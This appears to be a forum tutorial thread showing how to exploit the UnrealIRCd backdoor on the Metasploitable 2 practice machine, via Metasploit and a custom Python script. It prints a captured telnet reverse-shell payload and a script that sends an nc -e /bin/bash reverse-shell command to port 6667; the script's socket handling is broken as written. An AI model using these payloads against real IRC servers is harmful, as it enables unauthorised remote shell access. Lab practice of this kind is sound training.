Metasploitable 2 How-to - IRC Backdoor exploitation ( Metasploit & python )

L3akM3-0day · April 26, 2017, 4:45pm

Metasploitable 2 - IRC Backdoor

The first tutorial on Metasploitable 2 was about the vsftp backdoor, in this post we will talk about the IRC Backdoor.

In the first part of this “How to” we will run the Metasploit exploit ( The skid way ).
The second part we will write our own python exploit to trigger the backdoor

#The Metasploit way

The first thing we need to do is a scan of the machine to see the open port (nmap example)

We know that irc is on the 6667, let’s use the -sV argument to see the version of the server

The version here is Unreal ircd, let’s run msfconsole and search for the exploit

We just need to set the RHOST and to use this exploit

Now we just need to run “exploit -j” and wait to attach to the session

You’re done you have succefully exploited the metasploit 2 Machine !

Understanding the exploit

The first part was really easy but let’s read the code to understand how it works

Let’s focus on this part

Even if you don’t understand ruby you can understand how the exploit work

Metasploit will connect to the host and send

AB; the payload\n

This will trigger the backdoor and run whatever the payload is

Sniffing with wireshark

Let’s try to run the exploit and sniff the network with wireshark

As you can see we have the AB; sh

Let’s select the 2nd packet and go deeper

Here we see the complete payload

sh -c '(sleep 3862|telnet ip port| while : ; do sh && break; done 2>&1|telnet ip port > /dev/null 2>&1 &)'

This payload is a reverse shell

Now that we know how the exploit works it’s time to write our own implementation with python

#IRC Unreal Python

The Python script will just send the backdoor command to the irc server, we will use a netcat listener to get a reverse shell

#!/usr/bin/python
import socket
import argparse

parser = argparse.ArgumentParser(description='Python implementation of the Unreal IRC backdoor')
parser.add_argument('-i', '--host',help="Ip of the victim")
parser.add_argument('-p','--port' ,help="Port of the netcat listener")
arg =parser.parse_args()

socket.socket(socket.AF_INET,socket.SOCK_STREAM)
socket.connect((arg.host,6667))  # Connect to the irc server
socket.recv(2048) # Receive the response of the server
socket.send("AB; sh -c '(nc yourip" + " " + arg.port + " -e /bin/bash) '\n")
socket.close()

run the script

./unreal_irc.py -i 172.28.128.3 -p 1337

And here you go

pry0cc · April 26, 2017, 7:55pm

I am a fan of how you looked a bit closer at how it works, and how to do it yourself.

I would be interested in a tutorial on how to code a module for metasploit, for example converting scripts into a module. Metasploit can be a very useful framework, it isn’t all about the built in modules.

Many underestimate the power of metasploit, but it can be a very useful tool when used properly.

Nice article!

system · January 21, 2018, 12:42am

This topic was automatically closed after 30 days. New replies are no longer allowed.